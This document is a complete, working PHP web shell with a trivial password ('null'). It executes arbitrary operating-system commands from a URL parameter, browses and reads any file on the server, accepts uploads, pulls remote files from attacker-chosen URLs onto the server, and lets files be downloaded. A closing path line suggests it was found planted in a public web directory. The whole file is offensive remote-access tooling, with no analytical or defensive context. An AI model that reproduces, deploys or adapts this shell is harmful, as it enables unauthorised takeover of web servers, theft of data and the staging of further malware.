.-.-.-.-.-

<?php
error_reporting(0); 
session_start();

$scriptName = basename(__FILE__);

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
    $expectedPassword = 'null';
    if ($_POST['password'] === $expectedPassword) {
        $_SESSION['authenticated'] = true;
    } else {
        echo '<div style="color:red;">Invalid password. Access denied.</div>';
    }
}

if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {

?>
    <h2>Access Requested?</h2>
    <form method="POST" action="">
        <label for="password">Password:</label>
        <input type="password" name="password" id="password" required>
        <button type="submit">Submit</button>
    </form>
    <?php
    exit();
}

if (isset($_POST['logout']) && $_POST['logout'] === 'true') {
    session_destroy();
    header("Location: $scriptName");
    exit();
}
?>
<!DOCTYPE html>
<html>
<head><title>Web Shell</title></head>
<body>

<b>Remote Code Execution</b><br />
<form method="GET" action="">
    Command: <input type="text" name="command" size="50" value="<?php echo isset($_GET['command']) ? htmlspecialchars($_GET['command']) : ''; ?>" />
    <button type="submit">Go</button>
</form>
<?php
if (isset($_GET['command'])) {
    $cmd = $_GET['command'];
    echo "<pre>Command: " . htmlspecialchars($cmd) . "\nOutput:\n";

$output = '';
    if (function_exists('shell_exec')) {
        $output = shell_exec($cmd);
    } elseif (function_exists('exec')) {
        exec($cmd, $out);
        $output = implode("\n", $out);
    } elseif (function_exists('system')) {
        ob_start();
        system($cmd);
        $output = ob_get_clean();
    } elseif (function_exists('passthru')) {
        ob_start();
        passthru($cmd);
        $output = ob_get_clean();
    } else {
        $output = 'No command execution function available.';
    }
    echo htmlspecialchars($output === null ? '(no output)' : $output) . "</pre>";
}
?>

<hr />

<b>Retrieve File / Scan Directory</b><br />
Current file path: <?php echo __FILE__; ?><br />
<form method="GET" action="">
    Path: <input type="text" name="path" size="50" value="<?php echo isset($_GET['path']) ? htmlspecialchars($_GET['path']) : ''; ?>" />
    <button type="submit">Go</button>
</form>
<pre>
<?php
if (isset($_GET['path'])) {
    $rawPath = $_GET['path'];
    $path = ($rawPath === '') ? './' : $rawPath;
    
    $real = realpath($path);
    echo '<b>Realpath:</b> ' . ($real ? htmlspecialchars($real) : 'Failed to resolve') . '<br />';
    
    echo '<b>Type:</b> ';
    if (is_dir($path)) {
        echo "Directory<br />";
        $items = @scandir($path);
        if ($items) {
            foreach ($items as $item) {
                echo htmlspecialchars($item) . "<br />";
            }
        } else {
            echo "Unable to read directory.";
        }
    } elseif (is_file($path)) {
        echo "File<br />";
        $content = @file_get_contents($path);
        echo $content !== false ? htmlspecialchars($content) : "Failed to read file.";
    } else {
        echo "Not a valid file or directory.";
    }
}
?>
</pre>

<hr />

<b>Upload File From Your Local Machine</b><br />
<form method="POST" action="" enctype="multipart/form-data">
    File(s): <input type="file" name="uploads[]" multiple required />
    <button type="submit">Upload</button>
</form>
<?php
if (isset($_FILES['uploads'])) {
    foreach ($_FILES['uploads']['name'] as $i => $name) {
        if ($_FILES['uploads']['error'][$i] === UPLOAD_ERR_OK) {
            $tmp = $_FILES['uploads']['tmp_name'][$i];
            $dest = './' . basename($name);
            if (move_uploaded_file($tmp, $dest)) {
                echo "Successfully uploaded " . htmlspecialchars($name) . "<br />";
            } else {
                echo "Unable to upload " . htmlspecialchars($name) . "<br />";
            }
        }
    }
}
?>

<hr />

<b>Upload File From URL</b><br />
<form method="POST" action="">
    Filename to save: <input type="text" name="save_name" size="30" required /><br />
    URL: <input type="text" name="url" size="50" required />
    <button type="submit">Upload</button>
</form>
<pre>
<?php
if (isset($_POST['save_name']) && isset($_POST['url'])) {
    $saveAs = $_POST['save_name'];
    $url = $_POST['url'];
    $data = false;
    
    if (ini_get('allow_url_fopen')) {
        $data = @file_get_contents($url);
    }

if ($data === false && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        $data = curl_exec($ch);
        curl_close($ch);
    }
    
    if ($data !== false && file_put_contents($saveAs, $data)) {
        echo "Successfully uploaded " . htmlspecialchars($saveAs);
    } else {
        echo "Unable to upload " . htmlspecialchars($saveAs) . " (check URL or PHP configuration)";
    }
}
?>
</pre>

<hr />

<b>Download File From Web Server</b><br />
<form method="GET" action="">
    Filename to download: <input type="text" name="download" size="100" required />
    <button type="submit">Download</button>
</form>
<?php
if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file) && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . filesize($file));
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        ob_clean();
        flush();
        readfile($file);
        exit;
    } else {
        echo "File does not exist or is not a regular file.";
    }
}
?>

<hr />

<b>Logout</b><br />
<form method="POST" action="">
    <input type="hidden" name="logout" value="true" />
    <button type="submit">Logout</button>
</form>

</body>
</html>

/var/www/main-e-syn/public_html/p.php